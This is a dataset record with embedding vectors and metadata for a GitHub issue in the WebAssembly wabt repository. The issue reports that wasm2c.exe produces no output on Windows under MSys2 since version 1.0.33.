0.01738371141254902, 0.020380400121212006, 0.001859293319284916, -0.008997343480587006, 0.006578898057341576, 0.0033840048126876354, 0.012714111246168613, 0.0006405242602340877, -0.02653379738330841, 0.041982751339673996, -0.03322543576359749, 0.01539076678454876, -0.0024857250973582268, 0.003462195163592696, 0.00872822292149067, 0.027479354292154312, 0.001785648986697197, -0.002443902427330613, 0.002023856621235609, -0.008313632570207119, 0.005807904992252588, 0.00784812681376934, -0.015638066455721855, -0.013237805105745792, 0.006520709954202175, -0.008982796221971512, 0.02129686437547207, -0.018692944198846817, 0.0016720001585781574, -0.012168597429990768, 0.0011855836492031813, 0.011528527364134789, -0.012350435368716717, 0.015056184493005276, 0.002542095026001334, -0.02224242128431797, -0.00317125441506505, -0.011208493262529373, -0.004509581718593836, -0.007826306857168674, -0.008997343480587006, -0.03261445835232735, 0.006433427799493074, 0.009891985915601254, 0.01982761360704899, -0.004200457129627466, -0.012503179721534252, 0.03360365703701973, -0.014008797705173492, 0.0053642201237380505, 0.014256097376346588, -0.009135539643466473, 0.019551219418644905, 0.0001567216095281765, 0.011484886519610882, 0.005204203072935343, -0.0000952376431087032, -0.0190857145935297, -0.0042295511811971664, -0.017296427860856056, -0.016205400228500366, -0.023202525451779366, -0.0105538759380579, -0.013826959766447544, 0.031217943876981735, -0.027901219204068184, -0.029792334884405136, -0.013586933724582195, 0.005327852908521891, 0.009775609709322453, 0.021355051547288895, -0.04983815178275108, 0.005422408692538738, -0.02212604507803917, -0.009375565685331821, 0.020947735756635666, 0.007124411873519421, 0.009055531583726406, -0.000009752482583280653, -0.017325522378087044, -0.0004284557362552732, -0.0025439132004976273, -0.033778224140405655, -0.014568858779966831, 0.006768009625375271, -0.004142269026488066, 0.013332360424101353, 0.02589372731745243, -0.012430444359779358, -0.01387060061097145, 0.012539546936750412, -0.00703712971881032, -0.030956096947193146, 0.006287957075983286, 0.008553658612072468, -0.00740444241091609, 0.005611519794911146, 0.006593444850295782, -0.008153614588081837, 0.01750008761882782, -0.0012546820798888803, 0.0028694032225757837, 0.012481358833611012, -0.0053533101454377174, -0.007204420864582062, 0.003433101112022996, -0.004011345561593771, -0.01723824068903923, 0.006604355294257402, 0.027377525344491005, 0.0009355563670396805, -0.000011002618521160912, -0.011593989096581936, 0.01629268191754818, -0.009586498141288757, 0.030665157362818718, 0.008328179828822613, 0.028163066133856773, -0.007869947701692581, -0.01087391097098589, -0.03255627304315567, 0.0008214530535042286, -0.009346472099423409, 0.009084625169634819, 0.014968901872634888, -0.037647735327482224, -0.003654943313449621, -0.013310539536178112, 0.0063425088301301, -0.015347125008702278, 0.017078222706913948, 0.0009664688259363174, 0.007826306857168674, 0.01678728125989437, 0.019056620076298714, 0.023304354399442673, 0.016569076105952263, 0.004033166449517012, -0.012234059162437916, 0.00742262601852417, 0.010946646332740784, -0.00562606705352664, -0.004665962420403957, 0.004324106965214014, -0.0013946972321718931, 0.008335452526807785, 0.004047713242471218, 0.005135104525834322, -0.014387020841240883, -0.0008505471632815897, -0.003611302236095071, 0.020147647708654404, 0.0056224302388727665, -0.006604355294257402, -0.019522124901413918, 0.0005596063565462828, -0.008379094302654266, 0.006513436324894428, -0.0015919915167614818, 0.008037238381803036, 0.006451611407101154, -0.020874999463558197, -0.013085060752928257, -0.007520818617194891, -0.0020293118432164192, -0.007964503020048141, 0.01475069671869278, -0.015594424679875374, -0.02160235121846199, 0.01454703789204359, -0.013623300939798355, 0.018009232357144356, -0.010604790411889553, -0.022271515801548958, 0.009419207461178303, 0.010182926431298256, 0.005807904992252588, -0.01712186448276043, -0.0010864819632843137, 0.012692290358245373, 0.010866637341678143, -0.008313632570207119, -0.004422299563884735, -0.0074080792255699635, -0.008248170837759972, 0.01847473904490471, 0.006018836982548237, 0.016889112070202827, 0.0024329922161996365, -0.012997779063880444, 0.012750479392707348, 0.02107865922152996, 0.004284102935343981, 0.02186419814825058, -0.005349673330783844, -0.013295993208885193, -0.004898715298622847, 0.022824302315711975, -0.0022711562924087048, -0.0017720110481604934, 0.0018056511180475354, 0.006677090656012297, 0.004738697782158852, 0.016685452312231064, 0.019696690142154694, -0.013739677146077156, 0.0000550344011571724, -0.0002875312929973006, 0.001771101844497025, -0.003389459801837802, -0.01089573185890913, -0.019973084330558777, 0.013521471992135048, 0.00840818788856268, -0.0019965809769928455, 0.0012628647964447737, 0.002362075261771679, 0.017718292772769928, 0.007164416369050741, 0.012219511903822422, -0.005327852908521891, -0.011390331201255322, -0.014343379996716976, 0.0006291593890637159, -0.001015565125271678, -0.0011237587314099073, 0.013616027310490608, 0.010379311628639698, 0.014125173911452293, -0.011834015138447285, -0.007284429389983416, 0.02528275176882744, 0.0034858339931815863, 0.029443204402923584, -0.0018874781671911478, -0.0008596390252932906, 0.001330144819803536, 0.0065970816649496555, -0.0030403309501707554, -0.025573693215847015, 0.007498998194932938, -0.012197691947221756, 0.013346907682716846, 0.0077753919176757336, 0.004709603730589151, -0.00672800512984395, 0.012226785533130169, -0.0014237914001569152, -0.006851654965430498, 0.014379747211933136, 0.01776193454861641, 0.009870165027678013, -0.0005405133706517518, 0.011004834435880184, 0.01588536612689495, -0.0014410659205168486, 0.007629921659827232, -0.0006227950798347592, -0.007993597537279129, 0.010088371112942696, 0.002653016010299325, 0.00568425515666604, 0.01572534814476967, 0.00565516110509634, 0.005906097590923309, -0.019071167334914207, 0.012859581969678402, -0.01716550439596176, -0.01584172435104847, -0.007258972153067589, -0.018809320405125618, -0.0029403201770037413, -0.0059424652718007565, -0.011492160148918629, 0.0205113235861063, -0.0004509581776801497, 0.008837325498461723, 0.014008797705173492, 0.01269956398755312, -0.0028003049083054066, 0.011593989096581936, -0.0004700511635746807, -0.004655052442103624, 0.004982360638678074, -0.006087935529649258, -0.007549912668764591, -0.007564459927380085, 0.005706075578927994, -0.014801611192524433, 0.00003202053267159499, 0.02374076656997204, 0.009361019358038902, 0.009411933831870556, -0.008379094302654266, 0.015899913385510445, -0.008400914259254932, 0.008830051869153976, -0.007378985174000263, -0.007600827608257532, 0.005862456280738115, -0.0012383166467770934, 0.0009573769639246166, 0.004000435583293438, 0.0269120205193758, -0.0190857145935297, -0.01847473904490471, 0.022489720955491066, 0.01136851031333208, -0.003389459801837802, 0.0034130988642573357, -0.009848345071077347, 0.01413244754076004, 0.02084590494632721, 0.004440483637154102, -0.006957121193408966, -0.015550783835351467, -0.008422735147178173, 0.007204420864582062, -0.014496123418211937, -0.009230095893144608, -0.002582099288702011, -0.02928318828344345, -0.0032312609255313873, -0.009208275005221367, -0.0106702521443367, 0.006473431829363108, -0.011943118646740913, -0.0017129137413576245, -0.0188529621809721, 0.0018474739044904709, -0.002452994231134653, 0.025864634662866592, -0.0004786884819623083, -0.02107865922152996, -0.00012501361197791994, -0.01010291837155819, 0.023304354399442673, -0.0010637522209435701, -0.006633449345827103, 0.017470993101596832, 0.01982761360704899, 0.014954355545341969, 0.0035603875294327736, -0.001938392873853445, -0.015172560699284077, -0.0018820230616256595, 0.0035603875294327736, -0.0029712326359003782, -0.001094664679840207, -0.017020035535097122, -0.013936062343418598, 0.011819468811154366, -0.016190852969884872, 0.00670982152223587, -0.009404660202562809, -0.01409608032554388, 0.003225805703550577, -0.003556750947609544, -0.015739895403385162, 0.000216955435462296, -0.023493466898798943, -0.00914281327277422, 0.008335452526807785, -0.006837108172476292, -0.010168380104005337, 0.0032385343220084906, -0.01387060061097145, 0.008670034818351269, -0.023129791021347046, 0.024177176877856255, -0.00700803566724062, -0.013565112836658955, 0.007182599976658821, 0.012859581969678402, 0.019434843212366104, 0.0036585801281034946, 0.008931881748139858, 0.004084080923348665, -0.015318031422793865, 0.0027893944643437862, -0.01413244754076004, -0.007535365875810385, -0.014045164920389652, -0.027202961966395378, 0.000018041737348539755, 0.027188414707779884, -0.009601045399904251, -0.008590025827288628, 0.0034840155858546495, 0.014408841729164124, -0.01802377961575985, -0.0024111715611070395, 0.007477177772670984, 0.005313305649906397, -0.027144772931933403, 0.015754442662000656, -0.018867509439587593, -0.012917770072817802, -0.0030312391463667154, 0.014256097376346588, 0.014379747211933136, 0.016379965469241142, -0.00354220368899405, 0.003342181909829378, -0.0006859837449155748, 0.013463283888995647, 0.007313523441553116, 0.026766549795866013, -0.022227874025702477, 0.006466158665716648, 0.011164851486682892, 0.0063134147785604, 0.01780557446181774, 0.024642683565616608, -0.008793684653937817, -0.0061570340767502785, 0.02288249135017395, 0.017296427860856056, -0.0005809723515994847, -0.006858928594738245, 0.013223257847130299, -0.023289809003472328, 0.014263371005654335, 0.0077317506074905396, 0.01648179441690445, -0.006142486818134785, -0.012735932134091854, 0.010452046990394592, 0.01083754375576973, 0.0002450266620144248, 0.01572534814476967, 0.0003627667610999197, 0.000463686854345724, -0.03104337863624096, 0.0041131749749183655, -0.0013201436959207058, 0.0015956282150000334, -0.02337709069252014, -0.02864311821758747, 0.003642214694991708, -0.0008600936271250248, -0.003967704717069864, -0.0365130640566349, 0.031101567670702934, 0.004793249070644379, 0.0012201328063383698, 0.008364547044038773, -0.006753462366759777, 0.008590025827288628, 0.010306576266884804, 0.012946863658726215, -0.030577873811125755, -0.01591446064412594, -0.024642683565616608, -0.0020947735756635666, 0.023187978193163872, 0.02190783992409706, 0.00526966480538249, 0.004778702277690172, -0.0018747495487332344, -0.01136851031333208, -0.0195657666772604, -0.02058405987918377, 0.004345927853137255, 0.006884385831654072, 2.628127049320028e-7, 0.008502744138240814, 0.01693275198340416, -0.026213763281702995, -0.00703712971881032, 0.023755313828587532, 0.010044730268418789, -0.0010501142824068666, -0.007004398852586746, 0.00004616980004357174, 0.028206707909703255, 0.008182709105312824, 0.005135104525834322, 0.003333090106025338, 0.004305923357605934, 0.03229442611336708, 0.013761498034000397, -0.0008382730884477496, -0.008211802691221237, -0.008946428075432777, -0.0022256968077272177, 0.003804050385951996, -0.002276611514389515, -0.013026872649788857, 0.02494817040860653, 0.017020035535097122, -0.0020529506728053093, -0.003920426592230797, -0.014874346554279327, 0.01716550439596176, 0.008480923250317574, 0.018431097269058228, -0.01851837895810604, -0.007659015711396933, -0.00816816184669733, -0.005116920452564955, -0.009666507132351398, 0.003111247904598713, 0.011717638932168484, 0.018387455493211746, -0.029181359335780144, 0.011033928021788597, 0.0012137684971094131, 0.016438152641057968, -0.02442447654902935, -0.027377525344491005, 0.009535583667457104, -0.012299520894885063, -0.009244643151760101, -0.0038731489330530167, -0.003931337036192417, -0.01245953794568777, -0.019100261852145195, 0.010146559216082096, 0.004033166449517012, -0.018503831699490547, -0.0009991996921598911, 0.012430444359779358, 0.023115243762731552, 0.00772447744384408, 0.007819033227860928, -0.00882277823984623, 0.004509581718593836, 0.0017529181204736233, -0.0033785495907068253, -0.007608100771903992, -0.022969773039221764, -0.008000871166586876, 0.023464372381567955, 0.01621994748711586, 0.013070513494312763, -0.010532055981457233, 0.009266463108360767, -0.003978615161031485, -0.005487869959324598, 0.005735169630497694, 0.018241986632347107, -0.003909516613930464, 0.0009041893645189703, 0.005604246631264687, -0.012968684546649456, -0.02446811832487583, -0.014874346554279327, -0.013506924733519554, 0.006204311735928059, 0.012794120237231255, -0.023013414815068245, 0.03662944212555885, 0.02314433827996254, -0.011761280708014965, 0.02043858915567398, -0.0018292900640517473, -0.004789612255990505, 0.008422735147178173, 0.001692911610007286, -0.007637194823473692, 0.003974978346377611, 0.01309960801154375, -0.010641158558428288, -0.038782402873039246, 0.022591549903154373, -0.00843000877648592, 0.022635191679000854, 0.006007927004247904, 0.007964503020048141, -0.013805138878524303, -0.008022691123187542, -0.009593771770596504, 0.018722038716077805, 0.00993562676012516, 0.010342944413423538, 0.0020729529205709696, -0.01057569682598114, 0.015870818868279457, 0.03357456251978874, -0.0035203832667320967, -0.0076662893407046795, -0.0011573986848816276, -0.004258645232766867, 0.012110409326851368, -0.033399999141693115, 0.011826742440462112, 0.02698475494980812, 0.01471432950347662, 0.002398442942649126, -0.013994250446557999, 0.011179398745298386, 0.008422735147178173, -0.00024616316659376025, -0.0013901513302698731, 0.0032458079513162374, 0.008240897208452225, -0.00890278723090887, -0.0044877612963318825, -0.005156924948096275, -0.0012674106983467937, -0.005400587804615498, 0.0014310649130493402, -0.004004072397947311, -0.0053533101454377174, -0.002531184582039714, -0.008953701704740524, -0.005091463215649128, 0.0015347125008702278, -0.03564024344086647, 0.01987125352025032, -0.013215984217822552, 0.0052369339391589165, 0.007826306857168674, -0.020351305603981018, -0.03729860484600067, -0.01365966908633709, -0.023958971723914146, -0.007949956692755222, -0.014408841729164124, 0.0034912892151623964, -0.009797430597245693, -0.012270426377654076, -0.0044259363785386086, -0.015827177092432976, -0.01010291837155819, 0.008757317438721657, 0.014525217935442924, 0.010590244084596634, -0.004054986871778965, -0.0026875652838498354, -0.031625259667634964, 0.007637194823473692, 0.011790374293923378, 0.013252351433038712, -0.00452412897720933, -0.02257700264453888, 0.027828484773635864, -0.018009232357144356, 0.018343815580010414, 0.0183729100972414, 0.002038403647020459, 0.023915329948067665, 0.027232054620981216, -0.019274825230240822, -0.01731097511947155, -0.013085060752928257, 0.00496781338006258, 0.010168380104005337, 0.013332360424101353, 0.0031003374606370926, 0.003785866778343916, -0.017936497926712036, 0.008008144795894623, -0.01292504370212555, 0.005226023495197296, 0.015987195074558258, 0.006557077635079622, 0.02046768181025982, -0.0025257295928895473, -0.0077317506074905396, 0.011077569797635078, 0.0077390242367982864, 0.004865984432399273, 0.007455356884747744, 0.0002591191150713712, 0.0013074150774627924, 0.00636069243773818, 0.015230748802423477, -0.03078153356909752, -0.0026784734800457954, -0.01918754354119301, -0.015943553298711777, 0.016758188605308533, 0.007637194823473692, -0.00801541842520237, 0.020409494638442993, 0.008284538052976131, -0.021180488169193268, 0.0019038436003029346, 0.016627265140414238, 0.0029712326359003782, -0.00808815285563469, -0.009302831254899502, 0.01576898992061615, -0.003094882471486926, 0.0034458297304809093, 0.004007709212601185, -0.02649015747010708, 0.006524346768856049, -0.021515069529414177, -0.016510888934135437, 0.0046586887910962105, -0.007069860585033894, -0.0014737967867404222, -0.0195657666772604, -0.04093536362051964, -0.0028657664079219103, 0.00024343559925910085, 0.017252787947654724, 0.01025566179305315, -0.001697457511909306, -0.0005400587688200176, -0.006826197728514671, -0.011812195181846619, 0.009251915849745274, -0.0034094620496034622, 0.019813066348433495, 0.004698693286627531, -0.013310539536178112, 0.014997996389865875, -0.0035440220963209867, -0.0051751090213656425, 0.052514806389808655, 0.004295012913644314, -0.008968248963356018, 0.013412369415163994, -0.004953266587108374, 0.003633122891187668, -0.002536639804020524, -0.01539076678454876, -0.0009141904301941395, 0.013746950775384903, -0.004964176565408707, 0.004280466120690107, 0.025035452097654343, -0.0211077518761158, -0.005822452250868082, -0.013063239865005016, -0.01023384090512991, 0.00916463416069746, -0.017732840031385422, -0.01745644584298134, -0.011855836026370525, -0.005106010474264622, 0.014968901872634888, -0.01712186448276043, -0.019798519089818, 0.013623300939798355, 0.009011889807879925, -0.019245730713009834, 0.013157796114683151, -0.023013414815068245, 0.011506707407534122, -0.00638978648930788, -0.0062115853652358055, -0.006753462366759777, 0.00698985205963254, 0.00869185570627451, 0.006975304801017046, 0.0002196830027969554, 0.004091354552656412, -0.027115678414702415, -0.0070262192748487, 0.028133971616625786, -0.004356837831437588, 0.002069316105917096, 0.011048475280404091, -0.002245699055492878, -0.016889112070202827, -0.007877221331000328, 0.0030257839243859053, -0.004320470150560141, -0.009673780761659145, 0.012634102255105972, 0.013892421498894691, 0.01764555647969246, 0.01780557446181774, -0.0024020797573029995, 0.00096555968048051, -0.005884277168661356, 0.005756990518420935, -0.01790740340948105, -0.007469904143363237, -0.024962717667222023, -0.00459322752431035, 0.007240788079798222, -0.004895078483968973, -0.011208493262529373, 0.01899843104183674, 0.028061237186193466, -0.024075347930192947, 0.008619120344519615, 0.008939155377447605, -0.022213326767086983, -0.0011255770223215222, 0.009535583667457104, -0.015318031422793865, -0.021515069529414177, -0.0038440548814833164, 0.003920426592230797, 0.0004014073347207159, -0.017325522378087044, -0.016845470294356346, -0.007437173277139664, 0.0035912999883294106, -0.001332872430793941, -0.00037867759237997234, -0.009659233503043652, -0.022489720955491066, -0.006247953046113253, 0.005324216093868017, 0.03179982677102089, 0.011972212232649326, 0.021238675341010094, -0.01166672445833683, -0.01814015582203865, -0.01588536612689495, -0.015201655216515064, 0.007877221331000328, -0.006738915573805571, 0.0009564677602611482, -0.009404660202562809, -0.009033710695803165, 0.013092334382236004, -0.002198421163484454, 0.008299085311591625, 0.012146776542067528, -0.011739459820091724, 0.004927809350192547, 0.007906314916908741, -0.00421500438824296, -0.012866855598986149, 0.018052874132990837, -0.011012108065187931, -0.015318031422793865, 0.00490962527692318, 0.01844564452767372, -0.015899913385510445, 0.01439429447054863, 0.011841288767755032, -0.003742225468158722, -0.00318034621886909, -0.006797103676944971, -0.00455322302877903, 0.03139250725507736, -0.006422517355531454, 0.013543292880058289, 0.0030548779759556055, 0.006517073139548302, 0.01224860642105341, -0.00593519164249301, 0.001137396553531289, 0.0035767529625445604, -0.025937369093298912, 0.010510235093533993, 0.008982796221971512, 0.009004616178572178, -0.008059059269726276, -0.026926567777991295, -0.005360583774745464, 0.02006036601960659, -0.005200566258281469, -0.02212604507803917, 0.03843327611684799, -0.009913806803524494, -0.00035913000465370715, 0.001963850110769272, 0.004676872864365578, -0.016772735863924026, -0.016903657466173172, -0.0031021558679640293, -0.012234059162437916, 0.015798082575201988, 0.005924281198531389, 0.011877656914293766, -0.009848345071077347, 0.0029930530581623316, 0.0007959957583807409, 0.018111063167452812, 0.01972578465938568, -0.0032385343220084906, -0.004829616751521826, -0.003956794273108244, -0.002882131841033697, 0.000042192092223558575, -0.005189655814319849, -0.006269773468375206, 0.029210451990365982, -0.0009437390835955739, -0.02491907589137554, 0.012488632462918758, 0.023202525451779366, 0.0015938099240884185, 0.004429573193192482, -0.004836890380829573, 0.00028480374021455646, -0.0071862367913126945, 0.017543727532029152, 0.0006237042834982276, -0.01443066168576479, 0.01607447676360607, 0.0065861716866493225, 0.025500958785414696, 0.004429573193192482, -0.03209076449275017, 0.0051932926289737225, 0.015536236576735973, 0.006226132158190012, 0.000056739132560323924, -0.032119859009981155, 0.0005355128669179976, 0.0015347125008702278, 0.003456739941611886, -0.013186889700591564, 0.025384580716490746, -0.014343379996716976, -0.0042731924913823605, 0.02987961657345295, 0.0125686414539814, 0.017150957137346268, 0.016699999570846558, -0.005207839887589216, 0.006840744521468878, -0.021005922928452492, -0.016990941017866135, 0.015085279010236263 ]
null
null
null
null
null
null
null
null
null
[ "WebAssembly", "wabt" ]
wasm2c.exe on Windows 10, ran through MSys2, does nothing at all since wabt 1.0.33. Nothing in stdout, nothing in output files, it appears to just not do anything. Only wabt 1.0.32 works correctly. The following are tested using the last 3 releases named `wabt-1.0.3x-windows.tar.gz` ``` user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.32/bin/wasm2c.exe wasm2c: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.33/bin/wasm2c.exe user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm2c.exe user@DESKTOP-AP5KGUV ~/home/wasm_app $ ``` All the other utilities appear to work correctly in wabt 1.0.34: ``` user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-decompile.exe wasm-decompile: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-objdump.exe wasm-objdump: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-strip.exe wasm-strip: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm2c.exe user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-interp.exe wasm-interp: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-stats.exe wasm-stats: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-validate.exe wasm-validate: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm2wat.exe wasm2wat: expected filename argument. Try '--help' for more information. ```
wasm2c does nothing at all
https://api.github.com/repos/WebAssembly/wabt/issues/2323/comments
4
2023-11-08T11:05:54
2023-12-05T18:37:14Z
https://github.com/WebAssembly/wabt/issues/2323
1,983,344,340
2,323
false
This is a GitHub Issue repo:wabt owner:WebAssembly Title : wasm2c does nothing at all Issue date: --- start body --- wasm2c.exe on Windows 10, ran through MSys2, does nothing at all since wabt 1.0.33. Nothing in stdout, nothing in output files, it appears to just not do anything. Only wabt 1.0.32 works correctly. The following are tested using the last 3 releases named `wabt-1.0.3x-windows.tar.gz` ``` user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.32/bin/wasm2c.exe wasm2c: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.33/bin/wasm2c.exe user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm2c.exe user@DESKTOP-AP5KGUV ~/home/wasm_app $ ``` All the other utilities appear to work correctly in wabt 1.0.34: ``` user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-decompile.exe wasm-decompile: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-objdump.exe wasm-objdump: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-strip.exe wasm-strip: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm2c.exe user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-interp.exe wasm-interp: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-stats.exe wasm-stats: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm-validate.exe wasm-validate: expected filename argument. Try '--help' for more information. user@DESKTOP-AP5KGUV ~/home/wasm_app $/home/lib/wabt-1.0.34/bin/wasm2wat.exe wasm2wat: expected filename argument. Try '--help' for more information. ``` --- end body ---
2,076
[ -0.011539030820131302, 0.021960942074656487, -0.011293808929622173, 0.021388757973909378, 0.015339963138103485, 0.027451176196336746, 0.021361511200666428, 0.04686453938484192, -0.00796288438141346, 0.019072778522968292, -0.00042594451224431396, 0.023990830406546593, 0.011007717810571194, 0.004379927180707455, -0.0057184272445738316, 0.0051155914552509785, -0.03315938636660576, 0.013201086781919003, 0.0005406792042776942, -0.01762869581580162, 0.020080910995602608, 0.038772232830524445, 0.013616601005196571, 0.04100647196173668, -0.0325327105820179, -0.016593316569924355, 0.0007871778216212988, 0.008555503562092781, 0.00627017579972744, -0.00322023406624794, -0.008712172508239746, 0.011395984329283237, -0.009856538847088814, 0.01096003595739603, 0.05127852410078049, -0.007308960892260075, 0.016797667369246483, 0.03997109457850456, -0.008916523307561874, 0.008964205160737038, -0.0456656776368618, -0.028527425602078438, -0.03528463840484619, 0.010060890577733517, -0.014754155650734901, 0.042695775628089905, 0.011382360942661762, -0.012996735982596874, 0.014331829734146595, -0.008725795894861221, 0.010442345403134823, -0.06114187464118004, -0.018268996849656105, -0.0586351677775383, 0.03798207640647888, -0.02172934263944626, 0.01859595812857151, -0.011143951676785946, 0.0002907747111748904, 0.02385459654033184, -0.003061861963942647, -0.006304234266281128, 0.015230975113809109, 0.01373239979147911, -0.0003482484898995608, 0.023241542279720306, -0.03501217067241669, 0.04621061682701111, 0.014781402423977852, -0.018446100875735283, -0.00799013115465641, -0.0009919547010213137, -0.011470913887023926, 0.04228707402944565, 0.027532916516065598, -0.03473970293998718, 0.02798249013721943, -0.005779732950031757, -0.022001812234520912, 0.03059818409383297, -0.02405894733965397, 0.007642734330147505, -0.027819009497761726, -0.004591090139001608, -0.02241051383316517, 0.037464383989572525, -0.024780986830592155, -0.04969821125268936, -0.0015854246448725462, -0.022587617859244347, 0.03765511140227318, 0.003049941500648856, 0.019100025296211243, 0.01765594258904457, -0.02505345642566681, 0.013201086781919003, -0.013132969848811626, 0.013602977618575096, -0.04002558812499046, -0.004284563474357128, 0.01893654279410839, -0.017615072429180145, -0.0023568503092974424, -0.01350761391222477, 0.011307432316243649, 0.009243485517799854, 0.04375839978456497, -0.024522142484784126, 0.01749246194958687, 0.09427401423454285, 0.0011537327663972974, -0.011750193312764168, -0.012233824469149113, -0.02382734790444374, 0.0021746372804045677, 0.02633405663073063, 0.0066652544774115086, -0.02422242797911167, -0.017533332109451294, 0.007213597185909748, -0.018091892823576927, 0.0021729343570768833, -0.0023977207019925117, -0.03073441982269287, -0.033513594418764114, 0.021647602319717407, -0.011586712673306465, 0.0013946968829259276, -0.008323905058205128, -0.011648017913103104, -0.05629194155335426, -0.01563967764377594, -0.014304582960903645, -0.011784251779317856, 0.0057252394035458565, -0.0584716871380806, -0.022342396900057793, 0.027560163289308548, -0.04569292441010475, -0.026456667110323906, -0.042695775628089905, -0.03125210851430893, 0.023786477744579315, -0.0046319602988660336, -0.012962677516043186, -0.03506666421890259, -0.038227297365665436, 0.005844444036483765, 0.0012610171688720584, 0.02172934263944626, -0.02144325152039528, -0.014863143675029278, 0.020380625501275063, 0.012036285363137722, 0.017778553068637848, -0.008494197390973568, 0.02675638161599636, -0.004141517449170351, 0.007377077825367451, -0.018418854102492332, -0.0194542333483696, -0.0014466361608356237, 0.013950374908745289, -0.023895466700196266, -0.03403128311038017, 0.00004733603782369755, -0.011722946539521217, 0.05457539111375809, -0.02696073427796364, 0.004740947391837835, -0.004233475308865309, 0.016416212543845177, 0.013582542538642883, 0.01318065170198679, -0.015762288123369217, 0.013303262181580067, -0.006743589416146278, 0.058417193591594696, -0.0003914602566510439, 0.01731535792350769, 0.009011887945234776, 0.0071659148670732975, -0.006287205033004284, -0.017560578882694244, 0.03215125575661659, 0.003627233672887087, 0.0024811639450490475, -0.017356228083372116, 0.017928410321474075, 0.0013129564467817545, -0.027246825397014618, 0.005653716158121824, -0.0009085113415494561, -0.027873503044247627, 0.013459932059049606, 0.02029888518154621, -0.03277793154120445, -0.02795524336397648, -0.005173490848392248, 0.028963375836610794, 0.004570655059069395, -0.007574617397040129, 0.02246500737965107, -0.02206992916762829, -0.0014032114995643497, 0.0075950524769723415, -0.0007918608607724309, 0.04122444614768028, 0.03457622230052948, -0.04740947484970093, -0.01538083329796791, -0.019263505935668945, -0.022274279966950417, -0.028827141970396042, -0.0030312093440443277, 0.008943770080804825, -0.009093628264963627, 0.023023568093776703, -0.04836311563849449, 0.031551823019981384, -0.006995622534304857, -0.0072067854925990105, 0.008473762311041355, -0.022315150126814842, -0.05819921940565109, -0.015135611407458782, -0.005146244075149298, -0.02709696814417839, 0.007969696074724197, 0.03735539689660072, 0.007227220572531223, -0.0019123865058645606, -0.012118025682866573, 0.04092473164200783, -0.031579069793224335, 0.0039882538840174675, 0.03127935528755188, 0.0005717576132155955, -0.03438549488782883, 0.007922014221549034, 0.02380010113120079, 0.03076166659593582, -0.008800724521279335, -0.030461950227618217, -0.011143951676785946, -0.01010857243090868, -0.009883785620331764, 0.01836436055600643, -0.038118310272693634, -0.015680547803640366, 0.019154518842697144, 0.04174213483929634, 0.01572141796350479, 0.008501009084284306, -0.00602154852822423, 0.012063532136380672, 0.01499937754124403, 0.029808027669787407, 0.027056097984313965, -0.01987655833363533, -0.03956238925457001, 0.032941412180662155, -0.01848697103559971, 0.01497213076800108, 0.03988935053348541, -0.008562315255403519, -0.04313172399997711, 0.01502662431448698, -0.0014466361608356237, -0.05291333422064781, 0.047981660813093185, -0.042750269174575806, -0.0034160707145929337, 0.016566069796681404, -0.013759646564722061, -0.013875446282327175, 0.01370515301823616, -0.0035523048136383295, 0.00878710113465786, -0.03969862312078476, 0.019631337374448776, 0.02615695260465145, 0.018405230715870857, 0.02869090624153614, 0.00580016802996397, 0.006947940681129694, 0.02565288543701172, -0.021647602319717407, -0.055093079805374146, -0.002283624606207013, 0.015448950231075287, -0.008889276534318924, -0.0195632204413414, 0.030434703454375267, -0.004090429749339819, -0.022287903353571892, 0.023309659212827682, 0.010101760737597942, -0.010510463267564774, 0.011763816699385643, -0.014331829734146595, 0.01668868027627468, 0.02795524336397648, 0.0030039625708013773, -0.04187837243080139, 0.02809147723019123, 0.047245994210243225, 0.009100439958274364, 0.025952601805329323, -0.023009944707155228, 0.025979848578572273, -0.025094326585531235, 0.020830197259783745, 0.011300620622932911, -0.02926309034228325, -0.004311810247600079, 0.039426155388355255, -0.047245994210243225, -0.031061381101608276, -0.004284563474357128, -0.04809064790606499, 0.0054357415065169334, -0.04356767237186432, -0.0027740674559026957, 0.0017608260968700051, -0.04413985833525658, -0.010646697133779526, 0.01528546866029501, -0.006641413550823927, -0.029535558074712753, 0.011988603509962559, -0.00317766098305583, -0.007172726560384035, -0.023445893079042435, 0.0001642259885556996, -0.06811705976724625, -0.027369435876607895, -0.012778760865330696, 0.025530274957418442, 0.0024300762452185154, -0.020394248887896538, 0.029780780896544456, -0.017724059522151947, -0.0002556518593337387, -0.004696671385318041, 